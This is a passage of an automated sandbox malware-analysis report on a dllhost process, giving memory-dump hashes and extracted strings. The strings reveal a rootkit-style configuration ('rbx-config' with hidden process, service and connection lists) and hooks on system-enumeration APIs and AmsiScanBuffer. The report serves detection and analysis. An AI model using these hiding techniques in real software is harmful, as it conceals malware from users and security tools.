                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                  • String ID:
                                  • API String ID: 3140674995-0
                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                  • Instruction ID: 8197a02182764d63abef3b5f0a9a5d7d68f587fd919c014875ad8a41159d3f9b
                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                  • Instruction Fuzzy Hash: 41313972205B81CAEB69DF60E8507EE6364F789748F44402ADB4E57BA5DF78C5488710
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                  • String ID:
                                  • API String ID: 3140674995-0
                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                  • Instruction ID: 7acd93f044d19ee7b4c6ecf2f55b70d0f026810908cc869920af204cec96f529
                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                  • Instruction Fuzzy Hash: E331F976245B80CAFB69DF60E8907EE6364F788B48F44402ADB4E57BA5DF78C548C710
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                  • String ID:
                                  • API String ID: 1239891234-0
                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                  • Instruction ID: b976ef55ed713149770ff284234e858a30d7340b325bec38d42b645c97bcf488
                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                  • Instruction Fuzzy Hash: 9A415832214B81C6EB69CB25E8407DF73A4F789B98F500225EB8E56BA9DF38C155CB00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                  • String ID:
                                  • API String ID: 1239891234-0
                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                  • Instruction ID: 9102aabf95f81014d42ced0451e5bd277f77fbea22f18e17977aadbe9fcca6c6
                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                  • Instruction Fuzzy Hash: 5D415B36254B80C6FB65DB24E8407DE77A4F789B98F500125EB8E57BA8DF38C559CB00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Find$CloseFile$FirstNext
                                  • String ID:
                                  • API String ID: 1164774033-0
                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                  • Instruction ID: 7104bc21b50e117f1c7faf8e45eb988fdbd32f8cc297e4f9de7045eecbf92355
                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                  • Instruction Fuzzy Hash: 83A1D432744682C9FB2ADB75A440BFF7BA2A789F9CF144115DB9A37AB9DA34C441C700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Find$CloseFile$FirstNext
                                  • String ID:
                                  • API String ID: 1164774033-0
                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                  • Instruction ID: d3274830dad9adf84ac85d72772a18b6c18389064a638dcd852d34f2736f1061
                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                  • Instruction Fuzzy Hash: FFA1E632788680C9FB2ADB759480BEF7BA0A789F9CF144115DB5B37AB9DA34C441E700

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
                                  • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                  • API String ID: 3993315683-3414887735
                                  • Opcode ID: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
                                  • Instruction ID: 0bd1eed236b6321b202bdd9012a21668a5814f2879643e8febc2c05628ee43d5
                                  • Opcode Fuzzy Hash: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
                                  • Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                  • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                  • API String ID: 2135414181-3414887735
                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                  • Instruction ID: 63c0af586dce6bff2cd4097693a3b49f886f3d37a5b8c0fa74ace211ab03a56f
                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                  • Instruction Fuzzy Hash: 13710776250B52C5FB15EF66E894ADE23A5FB8DB8CF406111DB4E67BA8DE38C444C340
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                  • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                  • API String ID: 2135414181-3414887735
                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                  • Instruction ID: b0eec26777479531566f6caa5bd0839dab250b02c4310144435cab1ad09b838c
                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                  • Instruction Fuzzy Hash: E971D636294A51C6FB15EF65E890ADA23A4FB89F8CF405112EB4F67B78DE38C454C740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                  • API String ID: 1735320900-4225371247
                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                  • Instruction ID: 2909d0be9a97d05e43a29b6993d0b555e120d64c891fdd689e49314e0f8e7216
                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                  • Instruction Fuzzy Hash: 505170B01D1A4AE5FB0AEB64EE40FD72320A74CB4CF904523D70A365B6DE78C25AC781
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                  • API String ID: 1735320900-4225371247
                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                  • Instruction ID: cc11b408aca93a02ae4f5107d11477bcbf574cac8075e55e7da5c8f93156a76d
                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                  • Instruction Fuzzy Hash: FD5154705E4A4AE6FB0ADB64EC45FDA2321AB4CF4CF904912DA0B63575DE78D25AC380
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                  • String ID: d
                                  • API String ID: 2005889112-2564639436
                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                  • Instruction ID: d0e8a6c38eb3db86fc6bc5d2415ad49811ff28525530ee78b62baf9c7bfd7613
                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                  • Instruction Fuzzy Hash: 7E514832240B95DAE729DF62E5487ABA7A1F78DF98F444124DB4A17B68DF3CC0498B00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                  • String ID: d
                                  • API String ID: 2005889112-2564639436
                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                  • Instruction ID: b22ff8036c1da1c3ad31e4595c0a8850c1ed2bc468cf833b4e8685240a5d3402
                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                  • Instruction Fuzzy Hash: A3514932284B84DAF729DF62E448B9A77A1FB89F99F444124DB4B57728DF3CD0498700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                  • API String ID: 740688525-1880043860
                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                  • Instruction ID: 6f0a6ca945857f10acad8be69f9231fa6bfc19f0ab3738687d31aa9c2c963ed5
                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                  • Instruction Fuzzy Hash: 5451BE31780746C1FA1ADB16A940BEB2291AB4CFB8F4807289F3E673E0EF78D4058640
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                  • API String ID: 740688525-1880043860
                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                  • Instruction ID: 87f68ddd6d39bac4dcc660ee8d04ff5fe8dd1530001522c57dc9458773e7517d
                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                  • Instruction Fuzzy Hash: 6E518B31785644D1FA1EDB56A840BEB2290AB4DFB8F584729AF3B673E0EF38D445C640
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                  • String ID: \GPU Engine(*)\Running Time
                                  • API String ID: 1943346504-1805530042
                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                  • Instruction ID: b99e6cab7b002ebe7b10ba186ef879e74ec6286c40f8cb6b41cb8a605bab9315
                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                  • Instruction Fuzzy Hash: 3531AE32A40B52D6F72ADF12A904B9BB3A0F78CFD9F4405259F4A63A64DF38C4568740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                  • String ID: \GPU Engine(*)\Running Time
                                  • API String ID: 1943346504-1805530042
                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                  • Instruction ID: 48f9a02a17a62890ebc0e7af7c22a680ce2622a398f7dc82b4e04793de15a47a
                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                  • Instruction Fuzzy Hash: 4B317F32684A41E6F72AEF12A844B9AA3A0BB8CFD9F4445259F4B63634DF38D4568740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                  • API String ID: 1943346504-3507739905
                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                  • Instruction ID: d919958bcd1b899ac55d4ff44e3e4b250feed147d51527985fd43890fa905512
                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                  • Instruction Fuzzy Hash: 1D316F31650B52CAFB5ADF22A944B9BA3A0B78DF98F4441259F4A63774DF38C446C600
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                  • API String ID: 1943346504-3507739905
                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                  • Instruction ID: e9454ae95fe4cc8feb11f1109876b64282de2ce6c286c512f1d48cb157c6b11d
                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                  • Instruction Fuzzy Hash: F6316F31694B41DAF72ADF22A884B9B67A1BB8CF98F4441259F4B63734DF38D446C600
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd
                                  Similarity
                                  • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                  • String ID:
                                  • API String ID: 4184240511-0
                                  • Opcode ID: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
                                  • Instruction ID: e7c2dfd052af18fd3abcefe0f72c8446b9113f84b0d7c840ae7e34f71e75c1d0
                                  • Opcode Fuzzy Hash: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
                                  • Instruction Fuzzy Hash: FF4146B2704A859AE711CF6AF8443DD63B1FB89B99F445225BF0A43A69DF38C159C304
